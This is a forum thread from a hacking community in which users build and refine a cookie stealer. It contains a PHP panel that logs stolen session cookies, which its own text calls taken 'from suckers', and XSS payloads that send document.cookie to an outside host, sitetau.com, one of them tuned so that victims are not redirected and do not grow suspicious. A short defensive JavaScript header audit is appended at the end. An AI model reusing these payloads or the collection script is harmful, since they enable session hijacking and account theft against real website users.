shadowSQLi (posted March 21, 2015; edited March 22, 2015 by shadowSQLi):

https://rstforums.com/forum/99145-php-cookie-stealer-version.rst#post619762

Sim Master (posted March 21, 2015):

Why do you use mysqli in one script and mysql_* in the other? And why does the SQL insert statement always have the same HTML code as the value for the ID field?

QUADMACHINE (posted March 21, 2015):

```php
<?php
//////////////////////
// Cookie stealer
//////////////////////
/*Database stuff*/
define(host, ""); //localhost as usual
define(user, ""); //root, gigel or petrica
define(pass, ""); //the user's password
define(db, ""); //the database name
try {
    $db = new mysqli(host, user, pass, db);
} catch (mysqli_sql_exception $e) {
    throw $e;
}
if(isset($_GET['act']) && ($_GET['act'] == "prune")){
    //Will delete results older than 30 days.
    $del_oldrecords = "DELETE FROM `cookies` WHERE `Date` < DATEADD(day, -30, GETDATE())";
    $db->query($del_oldrecords);
    $affected_rows = $db->affected_rows;
    print $affected_rows;
}
$cookie = "SELECT `ID`, `Cookie`, `IP`, `Date` FROM `cookies`";
$raw = $db->query($cookie);
if(!$raw)){
    die('There was an error running the query [' . $db->error . ']')
}
$values = $raw->fetch_all(MYSQLI_ASSOC);
$results = $raw->num_rows;
print 'Prune data: <a href="cookie.php?act=prune">Erase old data</a>';
print 'We\'ve stealed '.number_format($results).' cookies from suckers.';
foreach($values as $key){
    print '<tr><td>'.$key['ID'].'</td><td>'.$key['Cookie'].'</td><td>'.$key['IP'].'</td><td>'.$key['Date'].'</td></tr>';
}
?>
```

askwrite (posted March 22, 2015):

> Why do you use mysqli in one script and mysql_* in the other? And why does the SQL insert statement always have the same HTML code as the value for the ID field?

Because copy paste

activated (posted March 22, 2015):

Why does document.location="http://sitetau.com/cookie.php?shadow=" + document.cookie; work on some sites with XSS, while on others only document.location="http://sitetau.com/cookie.php?shadow=" works, that is, without document.cookie?

shadowSQLi (Author, posted March 22, 2015; edited March 22, 2015 by TheTime):

> Because copy paste

Where did you get the conclusion that I copied it? It's made by me; I only copied the MySQL connection.

> Why do you use mysqli in one script and mysql_* in the other? And why does the SQL insert statement always have the same HTML code as the value for the ID field?

Because ID is set from phpMyAdmin to have auto-increment.

Genius++ (posted March 22, 2015):

Is someone making a video? Also, it would be a cool thing for the script to be executed from an image, such as a smiley.

shadowSQLi (Author, posted March 22, 2015):

> Is someone making a video? Also, it would be a cool thing for the script to be executed from an image, such as a smiley.

I'll do it tonight, because right now I still have changes to make to the script and I'm also trying to make a more or less OK design.

askwrite (posted March 22, 2015):

And practically what did you do, if you said you copied the SQL? Ah, you stored a GET...

shadowSQLi (Author, posted March 22, 2015):

> And practically what did you do, if you said you copied the SQL? Ah, you stored a GET...

11:16 AM - askwrite clicked Dislikes for this post: query SQL by shadowSQLi
11:14 AM - askwrite clicked Dislikes for this post: cookie stealer by shadowSQLi
11:14 AM - askwrite clicked Dislikes for this post: cookie stealer by shadowSQLi
11:14 AM - askwrite clicked Dislikes for this post: cookie stealer by shadowSQLi
11:14 AM - askwrite clicked Dislikes for this post: cookie stealer by shadowSQLi

QUADMACHINE (posted March 22, 2015):

How frustrated, he dislikes everything in this thread. He's exactly like a yard dog: if someone invades his space, he bites anyone.

askwrite (posted March 22, 2015):

Ahahaha, so I'm the frustrated one, when you came here to suffer over a dislike given by mistake. The like / dislike buttons are there to be used.

QUADMACHINE (posted March 22, 2015):

And that's why I got 8 dislikes from you in 47 seconds, right? I'm the one suffering over a dislike? Chill ganja man, I've notified an administrator. Prepare ur anus!

shadowSQLi (Author, posted March 22, 2015; edited March 22, 2015 by shadowSQLi):

Demo: I'm making changes :D

TheTime (posted March 22, 2015):

I'm glad to see a few lines of code, you've made my Sunday nicer! You have a persistent XSS in the logs; you don't filter the received cookies at all. If you really want to use the script, there's a chance others will try to find out who you are. If your script is vulnerable, you're gonna have a bad time!

And put a password on access to the logs.

shadowSQLi (Author, posted March 22, 2015):

> I'm glad to see a few lines of code, you've made my Sunday nicer! You have a persistent XSS in the logs; you don't filter the received cookies at all. If you really want to use the script, there's a chance others will try to find out who you are. If your script is vulnerable, you're gonna have a bad time!
>
> And put a password on access to the logs.

OK, thanks, I'll take care of it now :D

0xStrait (Active Members, posted March 22, 2015):

A better idea, so as not to redirect the person away from the page, is to use an image; the fact that the victim gets redirected to another page can raise suspicion.

```html
<script>a=new Image();a.src="http://sitetau.com/cookie.php?shadow="+document.cookie;</script>
```

shadowSQLi (Author, posted March 22, 2015):

Done.. https://rstforums.com/forum/99145-php-cookie-stealer-version.rst#post619762

@0xStrait I posted your vector
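
Added example (not part of the thread and not any poster's code): both vectors quoted above depend on the session cookie being readable through `document.cookie`, and the `Image()` variant also depends on the page being allowed to load images from a foreign origin. The sketch below audits one response's headers for the `HttpOnly` flag and a restrictive `img-src`; the function names and header values are constructed for illustration.

```javascript
// Added example: audit a response's headers for the two defences that
// blunt the cookie-exfiltration vectors quoted in this thread.
// All header values below are constructed samples, not captured traffic.

// Parse one Set-Cookie value into { name, flags } (flag names lower-cased).
function parseSetCookie(value) {
  const [pair, ...attrs] = value.split(';').map(s => s.trim());
  const name = pair.split('=')[0];
  const flags = new Set(attrs.map(a => a.split('=')[0].toLowerCase()));
  return { name, flags };
}

// Parse a Content-Security-Policy value into Map(directive -> sources).
// A repeated directive is ignored: the first occurrence wins.
function parseCsp(value) {
  const policy = new Map();
  for (const part of (value || '').split(';')) {
    const [directive, ...sources] = part.trim().split(/\s+/);
    const key = (directive || '').toLowerCase();
    if (key && !policy.has(key)) policy.set(key, sources);
  }
  return policy;
}

// True when the policy lets an <img> / Image() load from an arbitrary origin.
function imgBeaconAllowed(policy) {
  const sources = policy.get('img-src') || policy.get('default-src');
  if (!sources) return true; // no image restriction at all
  return sources.some(s => ['*', 'http:', 'https:'].includes(s.toLowerCase()));
}

function auditResponse(headers) {
  const cookies = (headers['set-cookie'] || []).map(parseSetCookie);
  return {
    // Cookies without HttpOnly are what document.cookie hands to injected script.
    scriptReadable: cookies.filter(c => !c.flags.has('httponly')).map(c => c.name),
    imgBeaconAllowed: imgBeaconAllowed(parseCsp(headers['content-security-policy'])),
  };
}

const weak = { 'set-cookie': ['PHPSESSID=abc123; path=/'] };
const hardened = {
  'set-cookie': ['PHPSESSID=abc123; path=/; HttpOnly; Secure; SameSite=Lax'],
  'content-security-policy': "default-src 'self'; img-src 'self' data:",
};
console.log(auditResponse(weak), auditResponse(hardened));
```

CSP does not restrict the `document.location` redirect, so `HttpOnly` on session cookies is the control that covers both vectors.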